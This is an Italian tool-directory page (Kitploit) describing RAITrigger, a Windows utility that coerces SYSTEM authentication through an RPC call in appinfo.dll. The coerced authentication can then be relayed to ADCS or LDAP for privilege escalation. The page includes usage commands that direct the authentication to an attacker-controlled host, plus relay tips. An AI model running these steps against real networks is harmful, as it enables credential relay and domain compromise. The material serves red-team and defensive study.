Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RAITrigger — Trigger di autenticazione SYSTEM locale per il relaying | Kitploit
Strumenti/GitHubGitHub/rteccybersec/raitrigger
Escalation di PrivilegiExploitMovimento LateraleAutenticazioneRed Teaming
GitHubrteccybersec/raitrigger

RAITrigger

Trigger di autenticazione SYSTEM locale per il relaying

Vedi Repository
173251 anno faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

RAITrigger

La funzione RPC RAiForceElevationPromptForCOM della libreria appinfo.dll consente la coercizione di SYSTEM. Questa funziona solo su sistemi aggiunti a un dominio. Si scopre che questa funzione può essere chiamata da qualsiasi utente con privilegi limitati (non per avviare un processo) ma per attivare l'autenticazione SYSTEM verso una posizione arbitraria. Questo perché CreateFileW viene chiamato come SYSTEM sulla posizione del primo parametro di input:



Poiché l'utente con privilegi limitati viene comunque impersonato, questo non può essere usato come trigger Potato per elevare i privilegi da SEImpersonate a SYSTEM:



Ma può essere usato per richiedere un certificato per l'account computer a ADCS quando l'arruolamento Web è abilitato con l'autenticazione SMB in ingresso. Oppure può essere usato per LPE con relay verso LDAP, quando la firma LDAP non è abilitata.

Per attivare l'autenticazione SMB:

root@kitploit:~
[*] RAITrigger.exe \\attackerip\test\test.exe

Per attivare l'autenticazione HTTP (il servizio WebClient deve essere abilitato):

root@kitploit:~
[*] RAITrigger.exe \\hostname@80\test\test.exe

L'autenticazione HTTP viene attivata solo verso i sistemi della zona Intranet attendibile, quindi dovrai creare un record ADIDNS per il tuo IP Kali oppure essere nella stessa sottorete e usare, ad esempio, Responder. Non usare mai il nome FQDN completo, solo il nome host.

Chiamare questa funzione da remoto (anche con amministratore locale) porta a rpc_access_denied, quindi non è un'alternativa a, ad esempio, PetitPotam o strumenti simili:



Spazio per miglioramenti

  • La libreria NtApiDotNet è enorme. L'uso dei byte MIDL può ridurre drasticamente le dimensioni dell'assembly, in modo simile a SharpSystemTriggers

Riconoscimenti

  • https://github.com/warpnet/MS-RPC-Fuzzer
Scarica lo strumento